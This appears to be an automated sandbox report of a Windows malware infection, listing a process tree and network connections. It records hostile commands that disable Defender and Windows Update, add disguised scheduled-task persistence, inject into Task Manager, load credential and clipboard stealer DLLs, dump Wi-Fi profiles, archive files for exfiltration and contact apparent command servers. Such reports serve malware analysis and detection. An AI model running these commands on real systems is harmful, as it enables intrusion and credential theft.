"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9916 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\71B7.exe
C:\Users\Admin\AppData\Local\Temp\71B7.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b8 0x4cc
C:\Users\Admin\AppData\Local\Temp\7969.exe
C:\Users\Admin\AppData\Local\Temp\7969.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\9530.exe
C:\Users\Admin\AppData\Local\Temp\9530.exe
C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp" /SL5="$1001F4,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9716 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"
C:\Users\Admin\AppData\Local\Temp\A1C3.exe
C:\Users\Admin\AppData\Local\Temp\A1C3.exe
C:\Users\Admin\AppData\Local\Temp\A791.exe
C:\Users\Admin\AppData\Local\Temp\A791.exe
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s
C:\Users\Admin\AppData\Local\Temp\AF62.exe
C:\Users\Admin\AppData\Local\Temp\AF62.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8024 -ip 8024
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\B51F.exe
C:\Users\Admin\AppData\Local\Temp\B51F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 796
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 8356 -ip 8356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8356 -s 572
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\350690463354_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,10000963664395048842,14306676813467350217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Roaming\wweewrv
C:\Users\Admin\AppData\Roaming\wweewrv
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.177.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 34.203.168.32:443 | www.epicgames.com | tcp |
| US | 34.203.168.32:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.106.207.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | 32.168.203.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.47.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 192.229.233.50:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 68.232.34.217:443 | video.twimg.com | tcp |
| US | 104.244.42.5:443 | t.co | tcp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.233.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.34.232.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | community.akamai.steamstatic.com | udp |
| NL | 23.72.252.160:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.160:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.160:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | store.akamai.steamstatic.com | udp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
